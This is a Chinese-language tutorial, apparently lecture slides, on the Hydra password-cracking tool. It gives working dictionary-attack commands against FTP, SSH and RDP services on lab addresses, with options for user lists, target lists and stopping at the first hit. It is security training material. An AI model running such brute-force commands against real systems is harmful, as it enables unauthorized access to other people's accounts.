內容:
簡介
查看幫助
參數說明
Hydra的使用—爆破FTP 服務
圖形界面
破解3389 遠程桌面連接
破解SSH 服務
Hydra—簡介
• hydra著名黑客組織THC的一款開源的暴力破解工具。
• Hydra 支持多平臺版本
• 對需要網絡登錄的系統進行快速的字典攻擊—在線攻擊。
• 支持大量的服務,包括FTP/POP3/IMAP/Telnet/SSH 等。
Hydra—查看幫助
命令
hydra -h
Hydra—參數說明
Hydra—爆破FTP 服務
- 使用字典
使用事先準備好的用戶名字典和密碼字典 - 基本命令
hydra -l msfadmin -P password.dic 10.10.10.254 ftp
-l 指定用戶名
-P 指定密碼字典
server
services
指定用戶名字典
hydra -L username.dic -P password.dic 10.10.10.254 ftp
顯示詳細信息
hydra -l msfadmin -P password.dic 10.10.10.254 ftp -vV
[-e] 參數
hydra -l msfadmin -P password.dic 10.10.10.254 -vV -e nsr
將結果輸出到文件
hydra -l msfadmin -P password.dic 10.10.10.254 ftp -e nsr -oresult.out
使用地址列表
hydra -l msfadmin -P password.dic –M tatgets ftp -e nsr -oresult.out
適時停止
hydra -L username.dic -P password.dic -M targets ftp -vV -e nsr -F
hydra -L username.dic -P password.dic -M targets ftp -vV -e nsr -f
Hydra—圖形界面
啓動
xhydra
填寫配置
• 目標地址
• 端口號
• 協議類型
• 顯示詳細過程
填寫配置
• 用戶名(已知)
• 密碼字典
• 用戶名作爲密碼
• 空密碼
• 用戶名倒寫
填寫配置
• 默認即可
填寫配置
• 點擊【start】
• 等待。。。
• 查看結果
Hydra—破解3389 遠程桌面連接
hydra -l administrator -P ./dic/commonPsd.txt 10.10.10.130 rdp -vV -e nsr
Hydra—破解SSH 服務
hydra -l msfadmin -P ./dic/commonPsd.txt 10.10.10.254 ssh -vV -e nsr